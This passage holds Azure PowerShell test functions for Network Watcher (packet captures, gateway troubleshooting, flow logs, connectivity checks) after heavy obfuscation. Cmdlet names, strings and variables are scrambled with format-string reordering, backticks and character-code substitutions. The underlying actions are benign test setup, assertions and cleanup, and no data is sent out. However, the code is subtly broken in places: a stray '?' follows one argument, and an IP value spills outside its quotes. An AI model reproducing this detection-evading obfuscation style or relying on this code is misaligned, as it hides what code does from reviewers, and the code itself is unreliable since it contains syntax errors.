        &("{3}{1}{0}{2}{4}{5}"-f 'sou','w-AzRe','rceG','Ne','ro','up') -Name ${R`ESOUR`Cegr`oupName} -Location "$location"

        
        &("{5}{2}{6}{4}{0}{1}{3}{7}"-f 'ources','De','e','plo','s','G','t-TestRe','yment') -rgn "$resourceGroupName"
        
        
        &("{0}{3}{1}{4}{2}" -f 'New-AzRe','ourc','p','s','eGrou') -Name ${nwR`g`N`Ame} -Location "$location"
        
        
		${N`W} = &("{2}{1}{5}{4}{6}{0}{3}"-f'atche','ateTestN','Get-Cre','r','wor','et','kW') -location ${Loc`A`TioN} -nwName ${nwna`Me} -nwRgName ${nWr`gNAme}

        
        ${V`m} = &("{2}{1}{0}" -f'zVM','t-A','Ge') -ResourceGroupName ${ReSO`URc`eGROup`NaME}
        
        
        &("{3}{0}{1}{2}{4}" -f 'M','Ext','en','Set-AzV','sion') -ResourceGroupName "$resourceGroupName" -Location "$location" -VMName ${v`M}."NA`mE" -Name ("{4}{0}{3}{2}{1}"-f 'N','WatcherAgent','k','etwor','My') -Type ("{5}{1}{4}{6}{3}{2}{0}"-f 'dows','two','entWin','g','rkWa','Ne','tcherA') -TypeHandlerVersion "1.4" -Publisher ("{5}{1}{0}{2}{3}{6}{4}" -f't.Azure','of','.N','etwor','her','Micros','kWatc')?

        
        ${f`1} = &("{7}{0}{4}{5}{2}{8}{1}{3}{6}" -f 'e','terC','Capt','on','w-A','zPacket','fig','N','ureFil') -Protocol ("{0}{1}" -f'Tc','p') -RemoteIPAddress ("{2}{5}{0}{4}{3}{1}" -f'.','.255','1','.1-127.0.0','0.0','27') -LocalPort 80 -RemotePort ("{1}{0}"-f'0-120','8')
        ${f`2} = &("{1}{2}{6}{4}{7}{5}{3}{0}{8}"-f 'erConfi','Ne','w-AzP','t','p','reFil','acketCa','tu','g') -LocalIPAddress ("{1}{0}{2}" -f '7','12','.0.0.1');127.0.0.5

        
        ${j`OB} = &("{3}{8}{1}{5}{7}{0}{6}{2}{4}"-f'ketCa','tworkWat','tu','New','re','c','p','herPac','-AzNe') -NetworkWatcher ${N`W} -PacketCaptureName ${P`CN`Ame1} -TargetVirtualMachineId ${vM}."iD" -LocalFilePath ((("{1}{3}{0}{4}{2}"-f '0}tmp{0}C','C','ure.cap',':{','apt')) -f  [chaR]92) -Filter ${f`1}, ${F2} -AsJob
        ${J`Ob} | &("{1}{0}{2}" -f '-','Wait','Job')
        &("{4}{3}{5}{1}{2}{0}{6}"-f 'rPac','workWatch','e','w','Ne','-AzNet','ketCapture') -NetworkWatcher ${N`W} -PacketCaptureName ${P`CnA`me2} -TargetVirtualMachineId ${v`m}."i`d" -LocalFilePath (("{5}{6}{4}{0}{3}{1}{2}" -f 'tmp','re','.cap','DZjCaptu','j','C:','DZ')).ReplaCE('DZj','\') -TimeLimitInSeconds 1
        &("{2}{0}{1}" -f'tart','-Sleep','S') -s 2

        
        ${J`oB} = &("{6}{4}{0}{1}{5}{3}{2}" -f'twor','k','acketCapture','cherP','Ne','Wat','Get-Az') -NetworkWatcher ${nW} -PacketCaptureName ${PCnA`Me1} -AsJob
        ${J`OB} | &("{1}{0}{2}" -f'Jo','Wait-','b')
        ${p`C1} = ${J`oB} | &("{2}{1}{0}{3}" -f'e-Jo','eceiv','R','b')
        ${P`c2} = &("{1}{6}{3}{7}{5}{4}{2}{0}" -f'ture','Get','p','kWa','erPacketCa','h','-AzNetwor','tc') -NetworkWatcher ${N`w} -PacketCaptureName ${P`cNA`mE2}
        ${pc`L`IST} = &("{7}{5}{3}{2}{8}{0}{4}{6}{1}" -f 'ketC','e','e','N','apt','z','ur','Get-A','tworkWatcherPac') -NetworkWatcher ${NW} -PacketCaptureName "*"

        
        &("{2}{3}{4}{1}{0}"-f'ual','eEq','Ass','e','rt-Ar') ${P`C1}."NA`ME" ${PCn`A`Me1}
        &("{0}{2}{1}" -f 'Asser','AreEqual','t-') ("{1}{0}"-f 'ceeded','Suc') ${p`C1}."pR`o`VIsiONI`NgSTate"
        &("{3}{2}{4}{1}{0}"-f 'l','reEqua','ser','As','t-A') ${p`C1}."T`O`TAlB`YtEspE`RsEssI`On" 1073741824
        &("{3}{0}{1}{2}"-f 't','-AreEqua','l','Asser') ${P`C1}."BY`T`ES`TO`Cap`TUrEpeR`pa`CkeT" 0
        &("{2}{0}{1}" -f 's','sert-AreEqual','A') ${p`c1}."TI`MElIMi`TiNs`EcONDs" 18000
        &("{1}{0}{3}{2}"-f'-A','Assert','qual','reE') ${p`C1}."F`i`Lters"[0]."L`OCa`LPORT" 80
        &("{0}{3}{2}{1}" -f'As','al','ert-AreEqu','s') ${P`c1}."FI`LTeRS"[0]."p`ROt`OCOL" ("{1}{0}"-f'CP','T')
        &("{2}{1}{0}" -f'reEqual','-A','Assert') ${p`C1}."F`I`lters"[0]."re`moTE`ipADd`Re`SS" ("{1}{4}{2}{0}{6}{5}{3}"-f '1','127.0.0.','-','.0.255','1','7.0','2')
        &("{4}{3}{1}{2}{0}" -f 'al','eEq','u','rt-Ar','Asse') ${P`C1}."F`ilteRS"[1]."L`Oc`AlI`PA`DdreSS" ("{2}{1}{0}"-f'.1','27.0.0','1');127.0.0.5
        &("{1}{3}{0}{2}" -f'a','A','l','ssert-AreEqu') ${p`C1}."s`TO`RagEloCaTI`oN"."FI`LEp`Ath" ((("{4}{3}{5}{2}{6}{0}{1}" -f'ure.ca','p','5N0','0tm','C:5N','p','Capt'))  -CrepLAce'5N0',[CHar]92)

        ${cURr`EN`TcOu`Nt} = ${Pc`LISt}."cO`Unt";

        
        ${j`OB} = &("{1}{6}{7}{8}{0}{5}{2}{3}{4}" -f'kW','Sto','tch','erP','acketCapture','a','p-','AzN','etwor') -NetworkWatcher ${nW} -PacketCaptureName ${pc`NAME1} -AsJob
        ${j`ob} | &("{0}{2}{1}"-f 'Wa','t-Job','i')

        
        ${p`C1} = &("{0}{1}{4}{2}{8}{6}{7}{5}{3}"-f 'Ge','t','AzNetwo','Capture','-','rPacket','at','che','rkW') -NetworkWatcher ${N`w} -PacketCaptureName ${p`Cn`AME1}

        
        ${J`oB} = &("{9}{0}{3}{6}{10}{7}{2}{5}{8}{4}{1}" -f'-Az','re','ke','Network','tu','t','Wat','erPac','Cap','Remove','ch') -NetworkWatcher ${nW} -PacketCaptureName ${p`cNAM`e1} -AsJob
        ${J`Ob} | &("{1}{2}{0}"-f'Job','Wait','-')

        
        ${PC`l`iSt} = &("{4}{1}{2}{3}{6}{0}{7}{8}{5}" -f 'Wa','t','w','o','Get-AzNe','PacketCapture','rk','tc','her') -NetworkWatcher ${N`w}
        &("{0}{1}{2}"-f'Asse','rt-AreEqu','al') ${Pc`l`iSt}."C`OUnt" (${Cu`RREntcO`U`NT} - 1)

        
        &("{2}{5}{0}{3}{1}{4}{6}"-f 'kWa','etC','Rem','tcherPack','a','ove-AzNetwor','pture') -NetworkWatcher ${N`W} -PacketCaptureName ${Pc`NaMe2}

    }
    finally
    {
        
        &("{2}{0}{4}{3}{1}" -f 'n-','up','Clea','ceGro','Resour') ${reSoU`RC`eGRo`UPNaME}
        &("{3}{2}{0}{4}{1}"-f 'e','eGroup','-R','Clean','sourc') ${n`W`RgnaME}
    }
}


function T`ESt-T`ROUbLEshO`OT
{
    
    ${re`so`UrCe`GRoupNa`Me} = &("{0}{1}{3}{4}{2}" -f'G','et-NrpResourceGroupN','e','a','m')
    ${nWNA`me} = &("{1}{3}{4}{0}{2}"-f'm','Ge','e','t-N','rpResourceNa')
    ${LO`c`ATIoN} = &("{2}{1}{0}{3}" -f'oc','lotL','Get-Pi','ation')
    ${rEsoUrCe`T`Y`p`EPa`R`ENt} = ("{5}{4}{0}{6}{3}{2}{1}" -f'r','chers','Wat','ork','soft.Netwo','Micro','k/netw')
    ${nWL`Ocat`i`oN} = &("{3}{4}{5}{1}{2}{0}" -f'ation','derL','oc','Get','-Pr','ovi') ${RESOu`RcEty`pEpA`R`E`NT}
    ${n`wrG`Name} = &("{4}{5}{0}{1}{3}{2}" -f'source','G','me','roupNa','Get','-NrpRe')
    ${D`omAInNAm`el`ABeL} = &("{1}{5}{0}{3}{4}{2}"-f 'our','Ge','e','ce','Nam','t-NrpRes')
    ${vNE`Tna`ME} = &("{2}{0}{1}{4}{3}" -f'-NrpRe','sour','Get','eName','c')
    ${pub`lICI`pnAME} = &("{0}{1}{2}{4}{3}{5}"-f'Ge','t-N','rpRe','r','sou','ceName')
    ${vNETgate`wAyCON`F`IgnAMe} = &("{0}{3}{1}{5}{2}{4}" -f'Get-N','pResourc','a','r','me','eN')
    ${g`W`NaME} = &("{2}{0}{1}{4}{5}{3}" -f't-NrpResourc','e','Ge','me','N','a')
    
    try 
    {
        
        &("{3}{1}{2}{0}{4}" -f 'eG','zRes','ourc','New-A','roup') -Name ${ReSoU`R`CeGr`oUPNaMe} -Location "$location"

        
        ${s`UBn`et} = &("{3}{6}{1}{4}{0}{5}{2}" -f 'kSubn','al','onfig','New-A','Networ','etC','zVirtu') -Name ("{2}{0}{3}{1}{4}"-f 'ew','Sub','Gat','ay','net') -AddressPrefix ("{1}{2}{0}{3}" -f'2','10.0.','0.0/','4')
        ${v`NET} = &("{0}{2}{3}{1}"-f'Ne','ork','w-AzVi','rtualNetw') -Name ${VN`eTN`Ame} -ResourceGroupName ${rE`SO`Urcegr`ouP`NAmE} -Location ${lOc`A`TION} -AddressPrefix ("{1}{3}{2}{0}"-f '16','10.','/','0.0.0') -Subnet ${s`U`BnET}
        ${VN`eT} = &("{2}{3}{0}{1}" -f 'tualNet','work','Ge','t-AzVir') -Name ${v`NeTNa`mE} -ResourceGroupName ${Re`soU`RceGrO`UpNa`mE}
        ${suB`NEt} = &("{2}{5}{1}{3}{4}{6}{7}{0}" -f 'g','rkS','Get','u','bnetCo','-AzVirtualNetwo','n','fi') -Name ("{2}{0}{4}{3}{1}"-f'eway','et','Gat','ubn','S') -VirtualNetwork ${V`Net}
 
        
        ${pU`BlIc`IP} = &("{3}{1}{0}{2}"-f 'AzPublicIpAddre','w-','ss','Ne') -ResourceGroupName ${REsO`Ur`ce`Gro`U`PNAME} -name ${p`UbLI`Cip`Name} -location ${lO`CATI`ON} -AllocationMethod ("{1}{2}{0}" -f'ic','Dyna','m') -DomainNameLabel ${d`OmaiN`NA`meLABeL}    
 
        
        ${v`N`E`T`IpcONFig} = &("{4}{5}{7}{0}{2}{3}{9}{1}{8}{6}" -f 'etw','Co','o','rkGat','New-','AzVir','g','tualN','nfi','ewayIp') -Name ${V`NeT`ga`TEW`A`YcoNFi`gNamE} -PublicIpAddress ${PUbL`iC`ip} -Subnet ${sU`BneT}
        ${Gw} = &("{6}{1}{2}{5}{3}{0}{4}"-f 'ewa','w-AzVir','tualN','t','y','etworkGa','Ne') -ResourceGroupName ${rES`oURC`e`GROUP`NAme} -Name ${G`WN`Ame} -location ${LoC`A`T`Ion} -IpConfigurations ${VnEt`i`pCONf`Ig} -GatewayType ("{1}{0}"-f'pn','V') -VpnType ("{0}{3}{1}{2}"-f'Rou','ase','d','teB') -EnableBgp ${fAl`se}
        
        
        &("{5}{4}{3}{2}{1}{0}" -f'oup','ceGr','ur','zReso','-A','New') -Name ${NW`Rgn`AmE} -Location "$location"

		
		${N`W} = &("{4}{0}{7}{1}{5}{6}{2}{3}"-f'reat','tNet','rkWa','tcher','Get-C','w','o','eTes') -location ${lOCAtI`On} -nwName ${N`WnAme} -nwRgName ${NWrg`Name}

        
        ${sTo`NAME} = 'sto' + ${rEsoURceGRo`UpN`A`ME}
        ${st`otY`pe} = ("{0}{2}{1}" -f'Sta','rd_GRS','nda')
        ${CONt`A`inE`RnAMe} = ("{1}{0}" -f'nt','co') + ${reSO`U`Rce`GroU`PnamE}

        &("{2}{3}{4}{1}{0}"-f 't','un','New-AzStorage','Acc','o') -ResourceGroupName ${R`eSOuRc`E`gRoUPname} -Name ${St`O`NaMe} -Location ${L`Oca`TION} -Type ${sTo`TYpe};
        ${K`Ey} = &("{6}{5}{3}{1}{7}{2}{4}{0}" -f'ey','rageAc','o','AzSto','untK','t-','Ge','c') -ResourceGroupName ${re`sOU`R`C`egRO`UpNaME} -Name ${StO`N`AMe}
        ${co`NtE`Xt} = &("{1}{3}{2}{0}"-f 't','Ne','tex','w-AzStorageCon') -StorageAccountName ${stO`N`Ame} -StorageAccountKey ${k`eY}[0]."V`ALuE"
        &("{5}{6}{4}{3}{2}{1}{0}" -f'er','n','ai','orageCont','St','N','ew-Az') -Name ${c`ONT`A`ineR`NAmE} -Context ${c`oNt`Ext}
        ${c`OntaI`NER} = &("{3}{4}{0}{1}{2}"-f 'onta','in','er','Get-AzSt','orageC') -Name ${CONTAin`e`RN`A`mE} -Context ${cont`ext}

        ${s`To} = &("{4}{0}{2}{1}{3}"-f'et-Az','ageA','Stor','ccount','G') -ResourceGroupName ${RESo`URcE`Gro`Up`NamE} -Name ${s`ToNA`Me};

        &("{7}{0}{8}{6}{1}{5}{3}{2}{4}"-f't-','a','rR','e','esourceTroubleshooting','tch','kW','Star','AzNetwor') -NetworkWatcher ${n`W} -TargetResourceId ${GW}."i`D" -StorageId ${s`TO}."id" -StoragePath ${cOn`TA`I`NeR}."CloUD`BLOb`C`OntA`In`eR"."sTor`AGe`U`Ri"."PriMary`U`Ri"."aBs`OLutE`U`RI";
		${res`U`Lt} = &("{6}{1}{3}{2}{7}{4}{0}{8}{5}{10}{9}" -f'tch','t-Az','work','Net','a','rou','Ge','W','erT','ngResult','bleshooti') -NetworkWatcher ${n`W} -TargetResourceId ${G`W}."iD"

		
        &("{2}{4}{0}{3}{1}" -f'-','qual','Ass','AreE','ert') ${re`sUlT}."CO`De" ("{0}{1}{2}" -f 'U','nHealt','hy')
		&("{2}{1}{0}{3}"-f 't-A','ser','As','reEqual') ${r`e`sUlT}."rESU`Lts"[0]."I`d" ("{4}{1}{3}{2}{0}"-f 'ay','ti','w','onsFoundForGate','NoConnec')
    }
    finally
    {
        
        &("{2}{1}{5}{4}{3}{0}"-f'eGroup','e','Clean-R','c','r','sou') ${R`E`SOU`RCeg`RoUPNAme}
        &("{1}{0}{4}{3}{2}"-f'lea','C','up','ResourceGro','n-') ${NW`RGN`Ame}
    }
}


function t`eST-flow`log
{
    
    ${R`Esou`R`cEg`RoUPNaMe} = &("{2}{4}{1}{3}{0}{5}{7}{6}"-f 'ou','rp','Get-','Res','N','r','upName','ceGro')
    ${NwN`A`ME} = &("{5}{3}{4}{2}{1}{0}"-f 'me','Na','rce','t-NrpRe','sou','Ge')
    ${nW`RGNA`me} = &("{5}{0}{4}{3}{2}{7}{6}{1}"-f 'Nr','me','urceG','so','pRe','Get-','pNa','rou')
    ${d`oMai`NnAMELABel} = &("{0}{2}{3}{1}" -f'Get','esourceName','-','NrpR')
    ${nSG`Na`Me} = &("{2}{1}{3}{4}{0}"-f 'e','rpR','Get-N','esource','Nam')
	${st`on`AmE} =  &("{0}{1}{2}{3}"-f'Get-NrpResou','rc','eNam','e')
	${wo`RKSpa`c`EnaME} = &("{0}{1}{3}{2}" -f 'Get','-Nr','ceName','pResour')
    ${loC`AT`IOn} = &("{4}{3}{0}{1}{5}{2}" -f 'r','ovide','Location','et-P','G','r') ("{1}{5}{6}{3}{4}{8}{2}{7}{9}{0}" -f 'atchers','M','k','s','oft.','icr','o','/netw','Networ','orkW') ("{0}{4}{3}{1}{2}"-f 'We','l',' US','tra','st Cen')
    ${W`ORKSpaC`ELoc`Ati`oN} = &("{4}{3}{2}{0}{1}"-f'Provi','derLocation','-','t','Ge') ("{2}{1}{0}{4}{3}{5}"-f'urc','eso','R','Managem','e','ent') ("{0}{1}{2}" -f'Eas','t ','US')
	${fl`owLoG`FoRmatT`yPE} = ("{1}{0}"-f'son','J')
	${fLoWLogfo`R`m`ATve`RSioN} = "1"	
	${trAF`FicA`N`Aly`TiCSINTeRval} = 10;
	
    try 
    {
        
        &("{1}{3}{0}{2}{4}"-f'ceGro','New-AzR','u','esour','p') -Name ${RESoU`Rc`eg`RoUP`NaME} -Location "$location"

        
        ${N`sg} = &("{1}{2}{0}{5}{4}{3}"-f 'orkS','New-AzN','etw','Group','rity','ecu') -name ${NSgna`Me} -ResourceGroupName ${REs`OuR`cegRou`p`Na`Me} -Location ${LO`Ca`TiOn}

        
        ${g`et`NsG} = &("{6}{7}{2}{5}{3}{0}{1}{4}"-f 'r','kSec','et','o','urityGroup','w','Ge','t-AzN') -name ${Ns`Gn`AME} -ResourceGroupName ${resoU`RcEG`ROU`pNaME}
        
        
        &("{0}{3}{2}{5}{4}{1}" -f 'New','urceGroup','z','-A','so','Re') -Name ${nwRGn`AmE} -Location "$location"
        
        
		${nW} = &("{4}{5}{2}{3}{1}{0}" -f 'er','kWatch','estNetwo','r','Get-','CreateT') -location ${LoC`A`TioN} -nwName ${n`wN`AMe} -nwRgName ${nwrgn`Ame}
 
        
		${SToN`Ame} = 'sto' + ${sTo`NA`ME}
        ${s`Toty`pE} = ("{3}{1}{2}{0}"-f'ard_GRS','an','d','St')

        &("{4}{1}{2}{0}{3}" -f'cou','w-AzStora','geAc','nt','Ne') -ResourceGroupName ${r`ESo`URCeG`ROUpN`A`mE} -Name ${St`ON`Ame} -Location ${L`oCA`TIoN} -Type ${sTOt`Y`PE};
        ${S`To} = &("{4}{1}{0}{2}{3}"-f'AzStorag','-','eA','ccount','Get') -ResourceGroupName ${R`ES`OurCEg`ROu`pname} -Name ${St`oNamE};

		
		${wor`K`spA`CeNa`me} = ("{0}{1}{2}"-f'tawsp','a','ce') + ${Wo`RKs`P`ACen`Ame}
		${WO`R`KS`pAcesku} = ("{0}{1}"-f 'fre','e')

		&("{5}{7}{6}{2}{4}{1}{0}{3}{8}" -f 'ork','W','zOper','sp','ationalInsights','N','A','ew-','ace') -ResourceGroupName ${Resou`RCE`GrO`UpnAMe} -Name ${wO`R`k`spacenaMe} -Location ${WO`RKsP`A`CeLOC`Ati`ON} -Sku ${WOR`kSp`ACES`ku};
		${W`ORkSPa`CE} = &("{7}{0}{3}{5}{4}{1}{2}{6}{8}" -f 'et-A','a','lInsights','zOperat','n','io','Worksp','G','ace') -Name ${wORksp`AC`e`N`AMe} -ResourceGroupName ${rESOuR`ceGr`oup`Na`mE}
		
		
        ${j`Ob} = &("{0}{6}{3}{1}{2}{4}{5}" -f 'Se','z','Netwo','A','rkWat','cherConfigFlowLog','t-') -NetworkWatcher ${n`w} -TargetResourceId ${Ge`TN`sg}."id" -EnableFlowLog ${T`RUE} -StorageAccountId ${s`TO}."id" -EnableTrafficAnalytics:${Tr`UE} -Workspace ${W`Ork`spaCE} -AsJob -FormatType ${fLOwlOgfOR`mA`TtY`PE} -FormatVersion ${f`l`owl`OgFOr`matversIoN} -TrafficAnalyticsInterval ${tRafF`IcA`NA`LYT`Ic`sI`Nterval}
        ${j`Ob} | &("{1}{0}{2}" -f'Jo','Wait-','b')
        ${CONF`IG} = ${j`ob} | &("{1}{2}{0}" -f'Job','Re','ceive-')
		
        ${J`oB} = &("{8}{3}{0}{1}{7}{4}{2}{6}{5}" -f 'Net','workW','Sta','z','lowLog','s','tu','atcherF','Get-A') -NetworkWatcher ${N`W} -TargetResourceId ${getN`sG}."id" -AsJob
        ${J`oB} | &("{2}{0}{1}"-f'ait-Jo','b','W')
        ${sTat`US} = ${J`ob} | &("{1}{2}{0}" -f'ob','R','eceive-J')

        
        &("{1}{3}{0}{2}{4}" -f'-A','Ass','reE','ert','qual') ${cOnF`IG}."t`ARGeTR`es`ourcEId" ${GE`TnSG}."i`d"
        &("{0}{3}{2}{1}" -f 'Assert-AreEq','l','a','u') ${C`o`NfiG}."S`TOr`AgEid" ${s`TO}."iD"
        &("{3}{1}{0}{2}" -f'E','rt-Are','qual','Asse') ${c`On`FIg}."eNab`l`Ed" ${t`RUe}
        &("{2}{0}{1}" -f 'Equa','l','Assert-Are') ${c`On`FIg}."R`eTEntIonPolI`Cy"."Da`ys" 0
        &("{3}{0}{2}{1}" -f'sert-','l','AreEqua','As') ${co`N`FiG}."r`eTENtiO`N`POliCY"."e`N`AblEd" ${f`ALSE}
		&("{0}{3}{2}{1}" -f'Assert-A','l','Equa','re') ${cONf`ig}."FO`RMaT"."T`ype" ${F`LOW`LoGf`orM`A`Ttype}
		&("{3}{1}{2}{0}" -f'eEqual','rt','-Ar','Asse') ${cO`N`FiG}."f`OrM`AT"."VE`Rsi`On" ${FlOW`l`OG`FoRm`AtVeRsION}
		&("{0}{2}{1}{4}{3}"-f'Asse','t-','r','eEqual','Ar') ${coN`F`iG}."FLowaNA`lY`TIcsCo`NFIgu`Rat`i`on"."ne`Tworkw`A`TC`herFlO`Wan`A`L`yTiC`SCONfigu`R`AtIOn"."EN`ABLED" ${tr`Ue}
		&("{0}{3}{1}{2}"-f 'Asser','AreEqu','al','t-') ${ConF`ig}."F`lOwANAlYtIC`s`CO`NF`igUrA`TIOn"."nET`WorKwat`c`hErFLO`waNALyTics`c`o`NFiG`URAtIon"."wO`R`KS`PAceRes`o`Urc`EID" ${Wor`K`spaCE}."rEsOUrc`E`ID"
		&("{1}{0}{2}"-f 'Ar','Assert-','eEqual') ${CO`Nf`iG}."f`l`O`WaNalY`T`icsCON`F`IGu`RATion"."NE`Tworkw`ATCh`er`FloW`ANal`Yt`iCsCon`Figu`R`AT`ioN"."wOr`k`SPaCE`iD" ${WOrK`S`PACE}."CU`Stom`EriD".("{1}{0}"-f 'ing','ToStr').Invoke()
		&("{1}{0}{2}{4}{3}"-f 'ert-','Ass','Are','al','Equ') ${CoN`Fig}."f`lowaNa`LYtic`s`cONF`ig`UrATI`oN"."NE`TworkWAt`cheRfloWANa`lyTIC`scON`Fi`Gur`AtIoN"."WOrk`S`pAc`erEgION" ${wor`KSp`AcE}."Lo`C`ATION"
		&("{0}{3}{4}{1}{2}"-f 'Asse','Equa','l','rt-','Are') ${Co`NfiG}."f`LOWa`NaL`Y`TicSCoNfIGUrat`IOn"."nEtwoR`KW`A`T`Che`R`Flo`WAnal`y`TICsConfIgur`AT`IoN"."t`R`Af`FicANa`lyt`I`cSINteRVal" ${tRAffiCAN`ALyt`iC`SiNT`eRvaL}
		
		
        &("{2}{3}{4}{1}{0}" -f 'eEqual','Ar','A','s','sert-') ${St`AT`Us}."taRgE`T`RE`sO`URCEID" ${gE`Tnsg}."I`d"
        &("{2}{3}{0}{1}" -f 'reEqu','al','Assert-','A') ${s`TatuS}."s`TOra`gE`ID" ${S`To}."Id"
        &("{4}{2}{3}{0}{1}"-f 'qu','al','t-','AreE','Asser') ${S`T`ATuS}."enA`BL`ed" ${t`RuE}
        &("{2}{0}{1}"-f 'ssert-AreEqua','l','A') ${sT`Atus}."rEte`N`TIO`Npolicy"."Da`Ys" 0
        &("{3}{1}{4}{0}{2}" -f 't-AreEqu','e','al','Ass','r') ${stAt`US}."r`et`eNtIoN`poLIcy"."en`ABL`Ed" ${fa`LSE}
		&("{3}{1}{2}{0}" -f'Equal','sert-Ar','e','As') ${S`TA`Tus}."f`ormAT"."t`ype"  ${Fl`OwlOgF`ormATt`yPe}
		&("{0}{1}{2}{3}"-f'Asse','rt-Ar','e','Equal') ${STA`TUs}."For`mat"."Ver`S`ion" ${F`loWlOGFO`RMA`Tve`RSI`oN}
		&("{2}{0}{3}{1}" -f'sert-Ar','qual','As','eE') ${S`T`ATUS}."FLoWaNAlyTi`CsCoN`F`ig`URAT`ion"."neT`workWaTc`HErflow`ANA`lyT`i`C`SconfIGURAtion"."e`N`ABleD" ${TR`Ue}
		&("{0}{3}{1}{2}{4}" -f 'As','AreEqu','a','sert-','l') ${s`TaTus}."fLoWANa`LY`T`I`c`sC`o`Nfi`GuRATion"."neTwork`W`AtcherFlOwA`N`AlYTIC`sCo`NFIg`UrATIoN"."wORkSP`A`C`EreSOU`RCeiD" ${WOR`ksPA`cE}."r`esOURc`eID"
		&("{2}{1}{0}{3}" -f'reEq','rt-A','Asse','ual') ${ST`A`Tus}."FLowaN`A`LYTi`CSco`NFI`gUrATIon"."n`etworkwAtc`hERFLoWaNalYtICsCO`NFIg`Ur`At`i`on"."Wo`RKSPacE`iD" ${wORksP`A`ce}."CusT`OmeR`Id".("{0}{2}{1}" -f 'To','ing','Str').Invoke()
		&("{4}{3}{0}{2}{1}" -f'qu','l','a','rt-AreE','Asse') ${sTA`TUS}."fLoWANalyt`IcsC`ONF`I`GURa`TiOn"."nEtWOr`kwAT`chERFLowAnAlytIc`S`cONFi`g`URa`TI`on"."W`OrkSpACER`e`GIon" ${wo`RKSpa`cE}."L`Oca`TiOn"
		&("{2}{1}{0}"-f 'Equal','e','Assert-Ar') ${sTa`TuS}."FLO`wAN`A`LY`TiCs`cOnfig`UratiON"."nE`T`Wo`RK`WaT`CheRF`LOWAn`ALyT`ic`sc`OnFiGuRaTioN"."tRAF`FICan`A`LYT`ICsiNtERv`AL" ${trAfFi`CA`NaL`YtIcS`iNTe`R`VaL}
    }
    finally
    {
        
        &("{4}{2}{3}{5}{1}{0}"-f'eGroup','urc','-','Re','Clean','so') ${R`ESO`U`RCeGROU`pna`mE}
        &("{2}{3}{1}{0}" -f'roup','ceG','Clean-Re','sour') ${nWrgNA`me}
    }
}


function T`Est-c`O`Nn`EcTIVit`YCh`eck
{
    . ((("{1}{0}{3}{4}{2}" -f'TuAz','.g','.Resources.ps1','ur','eRM'))."r`EpLaCe"('gTu',[StRing][Char]92))

    
    ${rEsOuRCeGR`O`Upn`AmE} = &("{0}{4}{3}{2}{1}"-f 'Get-','ame','roupN','rpResourceG','N')
    ${Nw`NaME} = &("{3}{2}{0}{1}" -f'rceN','ame','et-NrpResou','G')
    ${n`w`RgnAMe} = &("{5}{2}{1}{4}{0}{3}" -f'Nam','e','rpResourc','e','Group','Get-N')
    ${sEcURit`Y`g`R`OU`pNaMe} = &("{4}{1}{3}{0}{2}" -f'urc','t-Nr','eName','pReso','Ge')
    ${tem`p`LAtEFILe} = (&("{0}{2}{3}{1}" -f'R','h','esolve-','Pat') ((("{7}{3}{8}{2}{0}{5}{6}{4}{1}" -f 'Data6ZtD','yment.json','t','t','o','ep','l','.6Z','Tes'))."rep`lACE"('6Zt',[STRINg][cHaR]92)))."p`AtH"
    ${PcN`Am`E1} = &("{1}{0}{3}{2}"-f'et-','G','urceName','NrpReso')
    ${P`CnA`ME2} = &("{1}{0}{3}{2}{4}" -f'Re','Get-Nrp','eNa','sourc','me')
    ${L`ocATion} = &("{0}{5}{2}{4}{3}{1}" -f 'Get-Pro','n','c','tio','a','viderLo') ("{6}{7}{8}{0}{2}{9}{3}{4}{1}{5}"-f'k','a','/n','tw','orkW','tchers','Micr','osoft.Netwo','r','e') ("{4}{3}{1}{2}{0}" -f 'ntral US','t C','e','s','We')
    
    try 
    {
        . ((("{0}{2}{5}{1}{4}{3}" -f'.4E7','eRM','Az','s.ps1','.Resource','ur'))."repL`ACe"(([ChaR]52+[ChaR]69+[ChaR]55),[sTrING][ChaR]92))

        
        &("{0}{5}{4}{3}{1}{2}" -f'N','eGro','up','rc','Resou','ew-Az') -Name ${rEsOURC`e`GRouP`NA`mE} -Location "$location"

        
        &("{1}{2}{5}{3}{0}{4}" -f 'men','G','e','estResourcesDeploy','t','t-T') -rgn "$resourceGroupName"
        
        
        &("{4}{5}{0}{1}{3}{2}"-f 'AzRes','ource','p','Grou','N','ew-') -Name ${nW`R`gNAMe} -Location "$location"
        
        
		${nw} = &("{1}{4}{3}{0}{2}"-f'c','Get-','her','kWat','CreateTestNetwor') -location ${LOc`At`ioN} -nwName ${N`wNAMe} -nwRgName ${nWr`gNA`Me}

        
        ${Vm} = &("{0}{1}{2}" -f 'Get-Az','V','M') -ResourceGroupName ${Re`Sou`RCe`gR`oupNAMe}
        
        
        &("{4}{0}{2}{1}{3}" -f'et','ens','-AzVMExt','ion','S') -ResourceGroupName "$resourceGroupName" -Location "$location" -VMName ${v`M}."n`AmE" -Name ("{2}{0}{3}{4}{1}"-f 'k','herAgent','MyNetwor','Wat','c') -Type ("{3}{6}{2}{4}{0}{5}{1}" -f'tc','ows','k','N','Wa','herAgentWind','etwor') -TypeHandlerVersion "1.4" -Publisher ("{6}{2}{0}{3}{5}{4}{1}" -f'wor','er','zure.Net','kWa','ch','t','Microsoft.A')

		
		${cOnf`IG} = &("{1}{10}{3}{2}{0}{8}{7}{6}{9}{4}{11}{5}"-f 't','N','Pro','w-AzNetworkWatcher','at','n','nfigu','Co','ocol','r','e','io') -Protocol ("{0}{1}"-f 'Ht','tp') -Method "Get" -Header @{("{0}{1}"-f'a','ccept')=("{0}{2}{3}{4}{1}"-f'a','json','ppli','c','ation/')} -ValidStatusCode @(200,202,204)

        
        ${j`OB} = &("{3}{5}{1}{4}{2}{0}" -f'y','t','it','Test-Az','workWatcherConnectiv','Ne') -NetworkWatcher ${Nw} -SourceId ${vM}."I`d" -DestinationAddress ("{0}{1}"-f'bing','.com') -DestinationPort 80 -ProtocolConfiguration ${C`ONFIG} -AsJob
        ${j`oB} | &("{1}{2}{0}"-f'b','Wa','it-Jo')
        ${C`HE`Ck} = ${j`Ob} | &("{0}{2}{1}" -f 'Re','ob','ceive-J')

        
        &("{4}{2}{0}{3}{1}"-f'se','qual','s','rt-AreE','A') ${cHE`Ck}."cONNeCtIOnst`A`T`US" ("{1}{2}{0}{3}"-f 'ha','Rea','c','ble')
        &("{1}{0}{4}{2}{3}"-f'ssert-A','A','eEqua','l','r') ${Che`Ck}."P`RO`BesfaiLEd" 0
        &("{3}{0}{2}{1}{4}"-f 'sert','reEq','-A','As','ual') ${C`h`EcK}."ho`pS"."C`OUNt" 2
